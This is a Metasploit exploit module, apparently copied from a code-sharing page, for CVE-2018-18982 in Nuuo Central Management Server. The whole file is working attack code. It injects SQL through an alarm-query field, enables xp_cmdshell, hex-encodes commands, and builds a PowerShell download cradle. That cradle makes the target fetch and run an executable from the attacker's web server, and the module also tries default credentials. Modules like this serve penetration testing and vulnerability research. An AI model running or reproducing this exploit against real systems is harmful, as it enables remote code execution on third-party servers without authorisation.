Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::EXE
10
  include Msf::Exploit::FileDropper
11
  include Msf::Exploit::Remote::Nuuo
12
  include Msf::Exploit::Remote::HttpServer
13

14
  def initialize(info={})
15
    super(update_info(info,
16
      'Name'            => 'Nuuo Central Management Authenticated SQL Server SQLi',
17
      'Description'     => %q{
18
      The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
19
      This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
20
      installed by default, xp_cmdshell can be enabled and abused to achieve code execution.
21
      This module will either use a provided session number (which can be guessed with an auxiliary
22
      module) or attempt to login using a provided username and password - it will also try the
23
      default credentials if nothing is provided.
24
      },
25
      'License'         => MSF_LICENSE,
26
      'Author'          =>
27
        [
28
          'Pedro Ribeiro <[email protected]>'  # Vulnerability discovery and Metasploit module
29
        ],
30
      'References'      =>
31
        [
32
          [ 'CVE', '2018-18982' ],
33
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
34
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
35
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]
36

37
        ],
38
      'Platform'        => 'win',
39
      'Arch'            => ARCH_X86,
40
      'Stance'          => Msf::Exploit::Stance::Aggressive,  # we need this to run in the foreground
41
      'Targets'         =>
42
        [
43
          [ 'Nuuo Central Management Server <= v2.10.0', {} ],
44
        ],
45
      'Notes'           =>
46
        {
47
          'SideEffects'   => [ ARTIFACTS_ON_DISK ]
48
        },
49
      'Privileged'      => false,  # we run as NETWORK_SERVICE
50
      'DisclosureDate'  => '2018-10-11',
51
      'DefaultTarget'   => 0))
52
    register_options [
53
      Opt::RPORT(5180),
54
      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),
55
      OptString.new('URIPATH', [true,  'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])
56
    ]
57
  end
58

59

60
  def inject_sql(sql)
61
    res = ncs_send_request({
62
      'method' => 'GETOPENALARM',
63
      'user_session' => user_session,
64
      'device_id' => "#{rand_text_numeric(4)}",
65
      'source_server' => "';#{sql};-- ",
66
      'last_one' => "#{rand_text_numeric(4)}"
67
    })
68
  end
69

70
  # Handle incoming requests from the server
71
  def on_request_uri(cli, request)
72
    unless @pl
73
      print_error("A request came in, but the payload wasn't ready yet!")
74
      return
75
    end
76
    print_good('Sending the payload to CMS...')
77
    send_response(cli, @pl)
78

79
    Rex.sleep(3)
80

81
    print_status('Executing shell...')
82
    inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""))
83
    register_file_for_cleanup("c:/windows/temp/#{@filename}")
84
  end
85

86
  def create_hex_cmd(cmd)
87
    var = rand_text_alpha(2)
88
    hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x"
89
    cmd.each_byte { |b|
90
      hex_cmd << b.to_i.to_s(16)
91
    }
92
    hex_cmd << "; exec (@#{var})"
93
  end
94

95
  def primer
96
    # we need to roll our own here instead of using the MSSQL mixins
97
    # (tried that and it doesn't work)
98
    service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"
99
    print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
100
    @filename = "#{rand_text_alpha_lower(8..10)}.exe"
101
    ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"
102
    download_pl = %{xp_cmdshell }
103
    download_pl << %{'cd C:\\windows\\temp\\ && }
104
    download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }
105
    download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }
106
    download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }
107
    download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }
108
    download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}
109

110
    print_status('Injecting PowerShell payload')
111
    inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
112
    register_file_for_cleanup("c:/windows/temp/#{ps1}")
113
  end
114

115
  def exploit
116
    connect
117
    ncs_login
118
    fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS') unless user_session
119

120
    @pl = generate_payload_exe
121

122
    #do not use SSL
123
    ssl = datastore['SSL']
124
    datastore['SSL'] = false
125

126
    begin
127
      Timeout.timeout(datastore['HTTPDELAY']) {super}
128
    rescue Timeout::Error
129
      datastore['SSL'] = ssl
130
    end
131
  end
132
end
133

134